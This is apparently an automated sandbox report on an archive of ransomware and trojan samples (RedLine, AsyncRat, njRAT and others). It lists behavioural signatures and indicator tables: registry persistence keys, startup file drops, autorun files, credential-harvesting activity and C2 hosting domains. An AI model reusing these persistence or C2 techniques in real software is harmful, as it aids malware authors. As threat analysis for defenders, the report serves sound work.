Analysis Overview
SHA256: 194c7d681f8c905c6f89414ebf06a71f851e38b391bad73902aa4b4e73806a4c
Threat Level: Known bad
The file RNSM00462.7z was found to be: Known bad.
Malicious Activity Summary
Urelas
RedLine
Snake Keylogger payload
RedLine payload
CryptBot payload
Modifies WinLogon for persistence
SectopRAT
Snake Keylogger
NanoCore
CryptBot
SectopRAT payload
njRAT/Bladabindi
AsyncRat
SmokeLoader
Modifies Windows Firewall
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Obfuscated with Agile.Net obfuscator
Deletes itself
Checks computer location settings
Unsecured Credentials: Credentials In Files
Reads user/profile data of local email clients
Reads data files stored by FTP clients
Executes dropped EXE
Drops startup file
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
Adds Run key to start application
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Checks whether UAC is enabled
Drops desktop.ini file(s)
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops autorun.inf file
Suspicious use of SetThreadContext
Drops file in System32 directory
UPX packed file
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
NSIS installer
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Kills process with taskkill
Modifies registry key
Suspicious behavior: SetClipboardViewer
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
outlook_win_path
Suspicious use of FindShellTrayWindow
outlook_office_path
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
NTFS ADS
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported: 2024-10-08 19:44
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-10-08 19:43
Reported: 2024-10-08 19:48
Platform: win10v2004-20241007-en
Max time kernel: 242s
Max time network: 245s
Command Line
Signatures
AsyncRat
CryptBot
CryptBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe" | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\JgyFDFhGJgjYGjkjhK\\ORz3qcl5PTvg.exe\",explorer.exe" | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe | N/A |
NanoCore
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Snake Keylogger
Snake Keylogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Urelas
njRAT/Bladabindi
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\magek.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\services32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe | C:\ProgramData\DLL32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4a8dc8cd9d3a2e42914844f5688d1f.exe | C:\Windows\chromet.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\filename.vbs | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe | C:\ProgramData\DLL32.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4a8dc8cd9d3a2e42914844f5688d1f.exe | C:\Windows\chromet.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PDF Reader Launcher.exe | C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "C:\\Users\\Admin\\AppData\\Roaming\\csrss.exe" | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4a8dc8cd9d3a2e42914844f5688d1f = "\"C:\\Windows\\chromet.exe\" .." | C:\Windows\chromet.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4a8dc8cd9d3a2e42914844f5688d1f = "\"C:\\Windows\\chromet.exe\" .." | C:\Windows\chromet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\ProgramData\\DLL32.exe\" .." | C:\ProgramData\DLL32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM_LOADER = "\\\\.\\F:\\Program Files\\PDF_Reader\\bin\\COM7.EXE" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceHelper = "C:\\Users\\Admin\\AppData\\Roaming\\ServiceHelper.exe" | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google_Update = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdate\\Google.exe" | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google_Update = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdate\\Google.exe" | C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\ProgramData\\DLL32.exe\" .." | C:\ProgramData\DLL32.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\desktop.ini | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | api.my-ip.io | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Windows\chromet.exe | N/A |
| File created | D:\autorun.inf | C:\Windows\chromet.exe | N/A |
| File created | F:\autorun.inf | C:\Windows\chromet.exe | N/A |
| File opened for modification | F:\AUTORUN.INF | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| File opened for modification | C:\AUTORUN.INF | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
Drops file in System32 directory
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-pl.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\System\FM20.DLL.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-convert-l1-1-0.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.scale-125.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\ShareProvider_CopyFile24x24.scale-200.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ppd.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Microsoft.Build.Utilities.v3.5.resources.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-colorize.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-24_altform-lightunplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL090.XML | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v8.1.dll.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-72_altform-unplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\MoveToFolderToastQuickAction.scale-80.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-oob.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.targetsize-256.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\security\cacerts.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\FileAssociation\FileAssociation.targetsize-16.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\LargeTile.scale-125.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-400_contrast-black.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\contrast-high\AboutBoxLogo.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\StoreLogo.scale-100.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
